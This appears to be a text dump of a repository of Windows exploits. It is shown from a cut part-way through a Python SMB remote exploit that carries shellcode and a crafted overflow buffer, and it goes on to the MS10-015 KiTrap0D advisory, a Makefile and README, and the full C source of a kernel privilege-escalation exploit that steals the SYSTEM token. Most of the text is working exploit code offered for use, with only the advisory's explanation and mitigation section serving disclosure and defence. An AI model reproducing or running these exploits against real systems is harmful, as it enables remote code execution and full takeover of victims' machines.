43 | shell += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a" 44 | shell += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" 45 | shell += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" 46 | shell += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40" 47 | shell += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57" 48 | shell += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9" 49 | shell += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0" 50 | shell += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" 51 | shell += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" 52 | shell += "\x53\xff\xd5" 53 | 54 | 55 | 56 | host = target, 445 57 | 58 | buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42" 59 | buff+="\x72\x00\x00\x00\x00\x18\x53\xc8" 60 | buff+="\x17\x02" #high process ID 61 | buff+="\x00\xe9\x58\x01\x00\x00" 62 | buff+="\x00\x00\x00\x00\x00\x00\x00\x00" 63 | buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02" 64 | buff+="\x04\x0d\xdf\xff"*25 65 | buff+="\x00\x02\x53\x4d" 66 | buff+="\x42\x20\x32\x2e\x30\x30\x32\x00" 67 | buff+="\x00\x00\x00\x00"*37 68 | buff+="\xff\xff\xff\xff"*2 69 | buff+="\x42\x42\x42\x42"*7 70 | buff+="\xb4\xff\xff\x3f" #magic index 71 | buff+="\x41\x41\x41\x41"*6 72 | buff+="\x09\x0d\xd0\xff" #return address 73 | 74 | #stager_sysenter_hook from metasploit 75 | 76 | buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01" 77 | buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d" 78 | buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9" 79 | buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4" 80 | buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a" 81 | buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00" 82 | buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24" 83 | buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10" 84 | buff+="\x68\x76\x01\x00\x00\x59\x89\xd8" 85 | buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31" 86 | buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb" 87 | buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d" 88 | buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00" 89 | buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10" 90 | buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0" 91 | buff+="\x83\xc2\x04\x81\x22\xff\xff\xff" 92 | buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff" 93 | buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f" 94 | buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18" 95 | buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10" 96 | buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08" 97 | buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73" 98 | buff+="\x73\x75\x15\xe8\x07\x00\x00\x00" 99 | buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9" 100 | buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34" 101 | buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff" 102 | 103 | buff+=shell 104 | 105 | s = socket() 106 | s.connect(host) 107 | s.send(buff) 108 | s.close() 109 | #Trigger the above injected code via authenticated process. 110 | subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True) 111 | -------------------------------------------------------------------------------- /MS10-015 - KiTrap0D/ADVISORY: -------------------------------------------------------------------------------- 1 | Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack 2 | ------------------------------------------------------------------------- 3 | 4 | In order to support BIOS service routines in legacy 16bit applications, the 5 | Windows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode 6 | monitor code. These are implemented in two stages, the kernel transitions to 7 | the second stage when the #GP trap handler (nt!KiTrap0D) detects that the 8 | faulting cs:eip matches specific magic values. 9 | 10 | Transitioning to the second stage involves restoring execution context and 11 | call stack (which had been previously saved) from the faulting trap frame once 12 | authenticity has been verified. 13 | 14 | This verification relies on the following incorrect assumptions: 15 | 16 | - Setting up a VDM context requires SeTcbPrivilege. 17 | - ring3 code cannot install arbitrary code segment selectors. 18 | - ring3 code cannot forge a trap frame. 19 | 20 | This is believed to affect every release of the Windows NT kernel, from 21 | Windows NT 3.1 (1993) up to and including Windows 7 (2009). 22 | 23 | Working out the details of the attack is left as an exercise for the reader. 24 | 25 | Just kidding, that was an homage to Derek Soeder :-) 26 | 27 | - Assumption 0: Setting up a VDM context requires SeTcbPrivilege. 28 | 29 | Creating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order 30 | to access the authenticated system service, NtVdmControl(). VdmAllowed can 31 | only be set using NtSetInformationProcess(), which verifies the caller has 32 | SeTcbPrivilege. If this is true, the caller is very privileged and can 33 | certainly be trusted. 34 | 35 | This restriction can be subverted by requesting the NTVDM subsystem, and then 36 | using CreateRemoteThread() to execute in the context of the subsystem process, 37 | which will already have this flag set. 38 | 39 | - Assumption 1: ring3 code cannot install arbitrary code segment selectors. 40 | 41 | Cpl is usually equal to the two least significant bits of cs and ss, and is 42 | a simple way to calculate the privilege of a task. However, there is an 43 | exception, Virtual-8086 mode. 44 | 45 | Real mode uses a segmented addressing scheme in order to allow 16-bit 46 | addresses to access the 20-bit address space. This is achieved by forming 47 | physical addresses from a calculation like (cs << 4) + (eip & 0xffff). The 48 | same calculation is used to map the segmented real address space onto the 49 | protected linear address space in Virtual-8086 mode. Therefore, I must be 50 | permitted to set cs to any value, and checks for disallowed or privileged 51 | selectors can be bypassed (PsSetLdtEnties will reject any selector where any 52 | of the three lower bits are unset, as is the case with the required cs pair). 53 | 54 | - Assumption 2: ring3 code cannot forge a trap frame. 55 | 56 | Returning to usermode with iret is a complicated operation, the pseudocode for 57 | the iret instruction alone spans several pages of Intel's Software Developers 58 | Manual. The operation occurs in two stages, a pre-commit stage and a 59 | post-commit stage. Using the VdmContext installed using NtVdmControl(), an 60 | invalid context can be created that causes iret to fail pre-commit, thus 61 | forging a trap frame. 62 | 63 | The final requirement involves predicting the address of the second-stage BIOS 64 | call handler. The address is static in Windows 2003, XP and earlier operating 65 | systems, however, Microsoft introduced kernel base randomisation in Windows 66 | Vista. Unfortunately, this potentially useful exploit mitigation is trivial 67 | to defeat locally as unprivileged users can simply query the loaded module list 68 | via NtQuerySystemInformation(). 69 | 70 | -------------------- 71 | Affected Software 72 | ------------------------ 73 | 74 | All 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to 75 | be affected, including but not limited to the following actively supported 76 | versions: 77 | 78 | - Windows 2000 79 | - Windows XP 80 | - Windows Server 2003 81 | - Windows Vista 82 | - Windows Server 2008 83 | - Windows 7 84 | 85 | -------------------- 86 | Consequences 87 | ----------------------- 88 | 89 | Upon successful exploitation, the kernel stack is switched to an attacker 90 | specified address. 91 | 92 | An attacker would trigger the vulnerability by setting up a specially 93 | formed VDM_TIB in their TEB, using a code sequence like this: 94 | 95 | /* ... */ 96 | // Magic CS required for exploitation 97 | Tib.VdmContext.SegCs = 0x0B; 98 | // Pointer to fake kernel stack 99 | Tib.VdmContext.Esi = &KernelStack; 100 | // Magic IP required for exploitation 101 | Tib.VdmContext.Eip = Ki386BiosCallReturnAddress; 102 | 103 | NtCurrentTeb()->Reserved4[0] = &Tib; 104 | /* ... */ 105 | 106 | Followed by 107 | 108 | /* ... */ 109 | NtVdmControl(VdmStartExecution, NULL); 110 | /* ... */ 111 | 112 | Which will reach the following code sequence via the #GP trap handler, 113 | nt!KiTrap0D. Please note how the stack pointer is restored from the saved 114 | (untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition 115 | described above. 116 | 117 | /* ... */ 118 | .text:0043C3CE Ki386BiosCallReturnAddress proc near 119 | .text:0043C3CE mov eax, large fs:KPCR.SelfPcr 120 | .text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi] 121 | .text:0043C3D7 mov edi, [edi] 122 | .text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase] 123 | .text:0043C3DC mov ecx, 84h 124 | .text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi 125 | .text:0043C3E4 rep movsd 126 | .text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi] 127 | .text:0043C3E9 add esp, 4 128 | .text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread] 129 | .text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi 130 | .text:0043C3F5 mov eax, [eax+KPCR.TSS] 131 | .text:0043C3F8 sub edi, 220h 132 | .text:0043C3FE mov [eax+KTSS.Esp0], edi 133 | .text:0043C401 pop edx 134 | .text:0043C402 mov [ecx+KTHREAD.Teb], edx 135 | .text:0043C405 pop edx 136 | .text:0043C406 mov large fs:KPCR.NtTib.Self, edx 137 | .text:0043C40D mov ebx, large fs:KPCR.GDT 138 | .text:0043C414 mov [ebx+3Ah], dx 139 | .text:0043C418 shr edx, 10h 140 | .text:0043C41B mov byte ptr [ebx+3Ch], dl 141 | .text:0043C41E mov [ebx+3Fh], dh 142 | .text:0043C421 sti 143 | .text:0043C422 pop edi 144 | .text:0043C423 pop esi 145 | .text:0043C424 pop ebx 146 | .text:0043C425 pop ebp 147 | .text:0043C426 retn 4 148 | /* ... */ 149 | 150 | Possibly naive example code for triggering this condition is availble from the 151 | link below. 152 | 153 | http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip 154 | 155 | The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista 156 | and Windows 7. Support for other affected operating systems is left as an 157 | exercise for the interested reader. 158 | 159 | ------------------- 160 | Mitigation 161 | ----------------------- 162 | 163 | If you believe you may be affected, you should consider applying the workaround 164 | described below. 165 | 166 | Temporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack 167 | from functioning, as without a process with VdmAllowed, it is not possible to 168 | access NtVdmControl() (without SeTcbPrivilege, of course). 169 | 170 | The policy template "Windows Components\Application Compatibility\Prevent 171 | access to 16-bit applications" may be used within the group policy editor to 172 | prevent unprivileged users from executing 16-bit applications. I'm informed 173 | this is an officially supported machine configuration. 174 | 175 | Administrators unfamiliar with group policy may find the videos below instructive. 176 | 177 | To watch a demonstration of this policy being applied to a Windows Server 2003 178 | domain controller, see the link below. 179 | 180 | http://www.youtube.com/watch?v=XRVI4iQ2Nug 181 | 182 | To watch a demonstration of this policy being applied to a Windows Server 2008 183 | domain controller, see the link below. 184 | 185 | http://www.youtube.com/watch?v=u8pfXW7crEQ 186 | 187 | To watch a demonstration of this policy being applied to an unjoined Windows XP 188 | Professional machine, see the link below. 189 | 190 | http://www.youtube.com/watch?v=u7Y6d-BVwxk 191 | 192 | On Windows NT4, the following knowledgebase article explains how to disable the 193 | NTVDM and WOWEXEC subsystems. 194 | 195 | http://support.microsoft.com/kb/220159 196 | 197 | Applying these configuration changes will temporarily prevent users from 198 | accessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users 199 | require this functionality. 200 | 201 | If you do not require this feature and depend on NT security, consider 202 | permanently disabling it in order to reduce kernel attack surface. 203 | 204 | ------------------- 205 | Solution 206 | ----------------------- 207 | 208 | Microsoft was informed about this vulnerability on 12-Jun-2009, and they 209 | confirmed receipt of my report on 22-Jun-2009. 210 | 211 | Regrettably, no official patch is currently available. As an effective and easy 212 | to deploy workaround is available, I have concluded that it is in the best 213 | interest of users to go ahead with the publication of this document without an 214 | official patch. It should be noted that very few users rely on NT security, the 215 | primary audience of this advisory is expected to be domain administrators and 216 | security professionals. 217 | 218 | Please note, Microsoft typically do not credit researchers who do not wait for 219 | permission to publish their research, and therefore I am unlikely to be 220 | referenced in their forthcoming update. 221 | 222 | ------------------- 223 | Credit 224 | ----------------------- 225 | 226 | This bug was discovered by Tavis Ormandy. 227 | 228 | ------------------- 229 | Greetz 230 | ----------------------- 231 | 232 | Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK, 233 | ScaryBeasts, spender and all my other elite colleagues. 234 | 235 | Check out some photography while at ring0 @ http://flickr.com/meder. 236 | 237 | ------------------- 238 | References 239 | ----------------------- 240 | 241 | Derek Soeder has previously reported some legendary NT bugs, including multiple 242 | vdm bugs that, while unrelated to this issue, make fascinating reading. 243 | 244 | - http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege Escalation 245 | - http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege Escalation 246 | - http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition Privilege Escalation 247 | 248 | 249 | -------------------------------------------------------------------------------- /MS10-015 - KiTrap0D/Makefile: -------------------------------------------------------------------------------- 1 | # Makefile for KiTrap0d->NtVdmControl() exploit. 2 | # - Tavis Ormandy 3 | 4 | CFLAGS=/Zi /Zp /Od /TC /nologo 5 | 6 | all: vdmallowed.exe vdmexploit.dll 7 | 8 | clean: 9 | rm -f *.obj *.exe *.dll *.pdb *.ilk *.exp *.lib 10 | 11 | vdmallowed.exe: vdmallowed.obj 12 | cl /Fe$(@F) $(**) 13 | 14 | vdmexploit.dll: vdmexploit.obj 15 | cl /Fe$(@F) /LD $(**) 16 | 17 | -------------------------------------------------------------------------------- /MS10-015 - KiTrap0D/README: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------- 3 | Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit 4 | -------------------------------------------- taviso@sdf.lonestar.org --- 5 | 6 | Tavis Ormandy, June 2009. 7 | 8 | Please see ADVISORY for discussion of the vulnerability itself. 9 | 10 | INSTRUCTIONS 11 | 12 | Use nmake[1] from visual c++ to build the exploit driver and payload. 13 | 14 | [1] NMAKE Reference, http://msdn.microsoft.com/en-us/library/dd9y37ha.aspx 15 | -------------------------------------------------------------------------------- /MS10-015 - KiTrap0D/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS10-015 - KiTrap0D/screenshot.png -------------------------------------------------------------------------------- /MS10-015 - KiTrap0D/vdmallowed.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS10-015 - KiTrap0D/vdmallowed.exe -------------------------------------------------------------------------------- /MS10-015 - KiTrap0D/vdmexploit.c: -------------------------------------------------------------------------------- 1 | // 2 | // -------------------------------------------------- 3 | // Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit 4 | // -------------------------------------------- taviso@sdf.lonestar.org --- 5 | // 6 | // Tavis Ormandy, June 2009. 7 | // 8 | // Tested on: 9 | // $ cmd /c ver 10 | // Microsoft Windows [Version 5.2.3790] 11 | // 12 | // This file contains the exploit payload and VDM Subsystem control routines. 13 | // 14 | 15 | #ifndef WIN32_NO_STATUS 16 | # define WIN32_NO_STATUS // I prefer the definitions from ntstatus.h 17 | #endif 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #ifdef WIN32_NO_STATUS 25 | # undef WIN32_NO_STATUS 26 | #endif 27 | #include 28 | 29 | // Process to escalate to SYSTEM 30 | static DWORD TargetPid; 31 | 32 | // Pointer to fake kernel stack. 33 | static PDWORD KernelStackPointer; 34 | 35 | #define KernelStackSize 1024 36 | 37 | // Enforce byte alignment by default 38 | #pragma pack(1) 39 | 40 | // Kernel module handle 41 | static HMODULE KernelHandle; 42 | 43 | // Eflags macros 44 | #define EFLAGS_CF_MASK 0x00000001 // carry flag 45 | #define EFLAGS_PF_MASK 0x00000004 // parity flag 46 | #define EFLAGS_AF_MASK 0x00000010 // auxiliary carry flag 47 | #define EFLAGS_ZF_MASK 0x00000040 // zero flag 48 | #define EFLAGS_SF_MASK 0x00000080 // sign flag 49 | #define EFLAGS_TF_MASK 0x00000100 // trap flag 50 | #define EFLAGS_IF_MASK 0x00000200 // interrupt flag 51 | #define EFLAGS_DF_MASK 0x00000400 // direction flag 52 | #define EFLAGS_OF_MASK 0x00000800 // overflow flag 53 | #define EFLAGS_IOPL_MASK 0x00003000 // I/O privilege level 54 | #define EFLAGS_NT_MASK 0x00004000 // nested task 55 | #define EFLAGS_RF_MASK 0x00010000 // resume flag 56 | #define EFLAGS_VM_MASK 0x00020000 // virtual 8086 mode 57 | #define EFLAGS_AC_MASK 0x00040000 // alignment check 58 | #define EFLAGS_VIF_MASK 0x00080000 // virtual interrupt flag 59 | #define EFLAGS_VIP_MASK 0x00100000 // virtual interrupt pending 60 | #define EFLAGS_ID_MASK 0x00200000 // identification flag 61 | 62 | #ifndef PAGE_SIZE 63 | # define PAGE_SIZE 0x1000 64 | #endif 65 | 66 | // http://svn.reactos.org/reactos/trunk/reactos/include/ndk/ketypes.h 67 | enum { VdmStartExecution = 0, VdmInitialize = 3 }; 68 | 69 | VOID FirstStage(); 70 | BOOL InitializeVdmSubsystem(); 71 | PVOID KernelGetProcByName(PSTR); 72 | BOOL FindAndReplaceMember(PDWORD, DWORD, DWORD, DWORD, BOOL); 73 | 74 | // This routine is where I land after successfully triggering the vulnerability. 75 | VOID FirstStage() 76 | { 77 | FARPROC DbgPrint; 78 | FARPROC PsGetCurrentThread; 79 | FARPROC PsGetCurrentThreadStackBase, PsGetCurrentThreadStackLimit; 80 | FARPROC PsLookupProcessByProcessId; 81 | FARPROC PsReferencePrimaryToken; 82 | FARPROC ZwTerminateProcess; 83 | PVOID CurrentThread; 84 | PVOID TargetProcess, *PsInitialSystemProcess; 85 | DWORD StackBase, StackLimit; 86 | DWORD i; 87 | 88 | // Keep interrupts off until I've repaired my KTHREAD. 89 | __asm cli 90 | 91 | // Resolve some routines I need from the kernel export directory 92 | DbgPrint = KernelGetProcByName("DbgPrint"); 93 | PsGetCurrentThread = KernelGetProcByName("PsGetCurrentThread"); 94 | PsGetCurrentThreadStackBase = KernelGetProcByName("PsGetCurrentThreadStackBase"); 95 | PsGetCurrentThreadStackLimit = KernelGetProcByName("PsGetCurrentThreadStackLimit"); 96 | PsInitialSystemProcess = KernelGetProcByName("PsInitialSystemProcess"); 97 | PsLookupProcessByProcessId = KernelGetProcByName("PsLookupProcessByProcessId"); 98 | PsReferencePrimaryToken = KernelGetProcByName("PsReferencePrimaryToken"); 99 | ZwTerminateProcess = KernelGetProcByName("ZwTerminateProcess"); 100 | 101 | CurrentThread = (PVOID) PsGetCurrentThread(); 102 | StackLimit = (DWORD) PsGetCurrentThreadStackLimit(); 103 | StackBase = (DWORD) PsGetCurrentThreadStackBase(); 104 | 105 | DbgPrint("FirstStage() Loaded, CurrentThread @%p Stack %p - %p", 106 | CurrentThread, 107 | StackBase, 108 | StackLimit); 109 | 110 | // First I need to repair my CurrentThread, find all references to my fake kernel 111 | // stack and repair them. Note that by "repair" I mean randomly point them 112 | // somewhere inside the real stack. 113 | DbgPrint("Repairing references to %p-%p in CurrentThread@%p...", 114 | &KernelStackPointer[0], 115 | &KernelStackPointer[KernelStackSize - 1], 116 | CurrentThread); 117 | 118 | // For every stack location, try to find all references to it in my 119 | // CurrentThread. 120 | for (i = 0; i < KernelStackSize; i++) { 121 | // The size of this structure varies between kernels, whats the maximum 122 | // size likely to be? 123 | CONST DWORD MaxExpectedEthreadSize = 0x200; 124 | 125 | // Find and repair all references to this location 126 | while (FindAndReplaceMember((PDWORD) CurrentThread, 127 | (DWORD) &KernelStackPointer[i], 128 | (DWORD) StackBase - ((StackBase - StackLimit) / 2), 129 | MaxExpectedEthreadSize, 130 | FALSE)) 131 | ; 132 | } 133 | 134 | // Find the EPROCESS structure for the process I want to escalate 135 | if (PsLookupProcessByProcessId(TargetPid, &TargetProcess) == STATUS_SUCCESS) { 136 | PACCESS_TOKEN SystemToken; 137 | PACCESS_TOKEN TargetToken; 138 | 139 | // What's the maximum size the EPROCESS structure is ever likely to be? 140 | CONST DWORD MaxExpectedEprocessSize = 0x200; 141 | 142 | DbgPrint("PsLookupProcessByProcessId(%u) => %p", TargetPid, TargetProcess); 143 | DbgPrint("PsInitialSystemProcess @%p", *PsInitialSystemProcess); 144 | 145 | // Find the Token object for my target process, and the SYSTEM process. 146 | TargetToken = (PACCESS_TOKEN) PsReferencePrimaryToken(TargetProcess); 147 | SystemToken = (PACCESS_TOKEN) PsReferencePrimaryToken(*PsInitialSystemProcess); 148 | 149 | DbgPrint("PsReferencePrimaryToken(%p) => %p", TargetProcess, TargetToken); 150 | DbgPrint("PsReferencePrimaryToken(%p) => %p", *PsInitialSystemProcess, SystemToken); 151 | 152 | // Find the token in the target process, and replace with the system token. 153 | FindAndReplaceMember((PDWORD) TargetProcess, 154 | (DWORD) TargetToken, 155 | (DWORD) SystemToken, 156 | MaxExpectedEprocessSize, 157 | TRUE); 158 | 159 | // Success, try to terminate the current process. 160 | ZwTerminateProcess(GetCurrentProcess(), 'w00t'); 161 | } else { 162 | // Maybe the user closed the window? 163 | DbgPrint("PsLookupProcessByProcessId(%u) Failed", TargetPid); 164 | 165 | // Report this failure 166 | ZwTerminateProcess(GetCurrentProcess(), 'LPID'); 167 | } 168 | 169 | // Oops, Something went wrong, restore interrupts and spin here. 170 | __asm sti 171 | 172 | for (;;) __asm pause 173 | } 174 | 175 | // Search the specified data structure for a member with CurrentValue. 176 | BOOL FindAndReplaceMember(PDWORD Structure, 177 | DWORD CurrentValue, 178 | DWORD NewValue, 179 | DWORD MaxSize, 180 | BOOL ObjectRefs) 181 | { 182 | DWORD i, Mask; 183 | 184 | // Microsoft QWORD aligns object pointers, then uses the lower three 185 | // bits for quick reference counting (nice trick). 186 | Mask = ObjectRefs ? ~7 : ~0; 187 | 188 | // Mask out the reference count. 189 | CurrentValue &= Mask; 190 | 191 | // Scan the structure for any occurrence of CurrentValue. 192 | for (i = 0; i < MaxSize; i++) { 193 | if ((Structure[i] & Mask) == CurrentValue) { 194 | // And finally, replace it with NewValue. 195 | Structure[i] = NewValue; 196 | return TRUE; 197 | } 198 | } 199 | 200 | // Member not found. 201 | return FALSE; 202 | } 203 | 204 | // Find an exported kernel symbol by name. 205 | PVOID KernelGetProcByName(PSTR SymbolName) 206 | { 207 | PUCHAR ImageBase; 208 | PULONG NameTable; 209 | PULONG FunctionTable; 210 | PUSHORT OrdinalTable; 211 | PIMAGE_EXPORT_DIRECTORY ExportDirectory; 212 | PIMAGE_DOS_HEADER DosHeader; 213 | PIMAGE_NT_HEADERS PeHeader; 214 | DWORD i; 215 | 216 | ImageBase = (PUCHAR) KernelHandle; 217 | DosHeader = (PIMAGE_DOS_HEADER) ImageBase; 218 | PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew); 219 | ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(ImageBase 220 | + PeHeader->OptionalHeader 221 | . DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] 222 | . VirtualAddress); 223 | 224 | // Find required tablesa from the ExportDirectory. 225 | NameTable = (PULONG)(ImageBase + ExportDirectory->AddressOfNames); 226 | FunctionTable = (PULONG)(ImageBase + ExportDirectory->AddressOfFunctions); 227 | OrdinalTable = (PUSHORT)(ImageBase + ExportDirectory->AddressOfNameOrdinals); 228 | 229 | // Scan each entry for a matching name. 230 | for (i = 0; i < ExportDirectory->NumberOfNames; i++) { 231 | PCHAR Symbol = ImageBase + NameTable[i]; 232 | 233 | if (strcmp(Symbol, SymbolName) == 0) { 234 | // Symbol found, return the appropriate entry from FunctionTable. 235 | return (PVOID)(ImageBase + FunctionTable[OrdinalTable[i]]); 236 | } 237 | } 238 | 239 | // Symbol not found, this is likely fatal :-( 240 | return NULL; 241 | } 242 | 243 | // Exploit entrypoint. 244 | BOOL APIENTRY DllMain(HMODULE Module, DWORD Reason, LPVOID Reserved) 245 | { 246 | CONST DWORD MinimumExpectedVdmTibSize = 0x400; 247 | CONST DWORD MaximumExpectedVdmTibSize = 0x800; 248 | FARPROC NtVdmControl; 249 | DWORD KernelStack[KernelStackSize]; 250 | DWORD Ki386BiosCallReturnAddress; 251 | CHAR Pid[32], Off[32], Krn[32]; 252 | struct { 253 | ULONG Size; 254 | PVOID Padding0; 255 | PVOID Padding1; 256 | CONTEXT Padding2; 257 | CONTEXT VdmContext; 258 | DWORD Padding3[1024]; 259 | } VdmTib = {0}; 260 | 261 | // Initialise these structures with recognisable constants to ease debugging. 262 | FillMemory(&VdmTib, sizeof VdmTib, 'V'); 263 | FillMemory(&KernelStack, sizeof KernelStack, 'K'); 264 | 265 | // Parent passes parameters via environment variables. 266 | // 267 | // - VDM_TARGET_PID 268 | // Pid of the process to transplant a SYSTEM token onto. 269 | // - VDM_TARGET_OFF 270 | // Offset from ntoskrnl of Ki386BiosCallReturnAddress. 271 | // - VDM_TARGET_KRN 272 | // Ntoskrnl base address. 273 | 274 | GetEnvironmentVariable("VDM_TARGET_PID", Pid, sizeof Pid); 275 | GetEnvironmentVariable("VDM_TARGET_KRN", Krn, sizeof Krn); 276 | GetEnvironmentVariable("VDM_TARGET_OFF", Off, sizeof Off); 277 | 278 | NtVdmControl = GetProcAddress(GetModuleHandle("NTDLL"), "NtVdmControl"); 279 | TargetPid = strtoul(Pid, NULL, 0); 280 | 281 | // Setup the fake kernel stack, and install a minimal VDM_TIB, 282 | KernelStackPointer = KernelStack; 283 | KernelStack[0] = (DWORD) &KernelStack[8]; // Esp 284 | KernelStack[1] = (DWORD) NtCurrentTeb(); // Teb 285 | KernelStack[2] = (DWORD) NtCurrentTeb(); // Teb 286 | KernelStack[7] = (DWORD) FirstStage; // RetAddr 287 | KernelHandle = (HMODULE) strtoul(Krn, NULL, 0); 288 | VdmTib.Size = MinimumExpectedVdmTibSize; 289 | *NtCurrentTeb()->Reserved4 = &VdmTib; 290 | 291 | // Initialize the VDM Subsystem. 292 | InitializeVdmSubsystem(); 293 | 294 | VdmTib.Size = MinimumExpectedVdmTibSize; 295 | VdmTib.VdmContext.SegCs = 0x0B; 296 | VdmTib.VdmContext.Esi = (DWORD) &KernelStack; 297 | VdmTib.VdmContext.Eip = strtoul(Krn, NULL, 0) + strtoul(Off, NULL, 0); 298 | VdmTib.VdmContext.EFlags = EFLAGS_TF_MASK; 299 | *NtCurrentTeb()->Reserved4 = &VdmTib; 300 | 301 | // Trigger the vulnerable code via NtVdmControl(). 302 | while (VdmTib.Size++ < MaximumExpectedVdmTibSize) 303 | NtVdmControl(VdmStartExecution, NULL); 304 | 305 | // Unable to find correct VdmTib size. 306 | ExitThread('VTIB'); 307 | } 308 | 309 | // Setup a minimal execution environment to satisfy NtVdmControl(). 310 | BOOL InitializeVdmSubsystem() 311 | { 312 | FARPROC NtAllocateVirtualMemory; 313 | FARPROC NtFreeVirtualMemory; 314 | FARPROC NtVdmControl; 315 | PBYTE BaseAddress; 316 | ULONG RegionSize; 317 | static DWORD TrapHandler[128]; 318 | static DWORD IcaUserData[128]; 319 | static struct { 320 | PVOID TrapHandler; 321 | PVOID IcaUserData; 322 | } InitData; 323 | 324 | NtAllocateVirtualMemory = GetProcAddress(GetModuleHandle("NTDLL"), "NtAllocateVirtualMemory"); 325 | NtFreeVirtualMemory = GetProcAddress(GetModuleHandle("NTDLL"), "NtFreeVirtualMemory"); 326 | NtVdmControl = GetProcAddress(GetModuleHandle("NTDLL"), "NtVdmControl"); 327 | BaseAddress = (PVOID) 0x00000001; 328 | RegionSize = (ULONG) 0x00000000; 329 | InitData.TrapHandler = TrapHandler; 330 | InitData.IcaUserData = IcaUserData; 331 | 332 | // Remove anything currently mapped at NULL 333 | NtFreeVirtualMemory(GetCurrentProcess(), &BaseAddress, &RegionSize, MEM_RELEASE); 334 | 335 | BaseAddress = (PVOID) 0x00000001; 336 | RegionSize = (ULONG) 0x00100000; 337 | 338 | // Allocate the 1MB virtual 8086 address space. 339 | if (NtAllocateVirtualMemory(GetCurrentProcess(), 340 | &BaseAddress, 341 | 0, 342 | &RegionSize, 343 | MEM_COMMIT | MEM_RESERVE, 344 | PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) { 345 | ExitThread('NTAV'); 346 | return FALSE; 347 | } 348 | 349 | // Finalise the initialisation. 350 | if (NtVdmControl(VdmInitialize, &InitData) != STATUS_SUCCESS) { 351 | ExitThread('VDMC'); 352 | return FALSE; 353 | } 354 | 355 | return TRUE; 356 | } 357 | 358 | -------------------------------------------------------------------------------- /MS10-015 - KiTrap0D/vdmexploit.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS10-015 - KiTrap0D/vdmexploit.dll -------------------------------------------------------------------------------- /MS10-059 - Chimichurri/14610.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS10-059 - Chimichurri/14610.zip -------------------------------------------------------------------------------- /MS10-059 - Chimichurri/MS10-059.exe: -------------------------------------------------------------------------------- 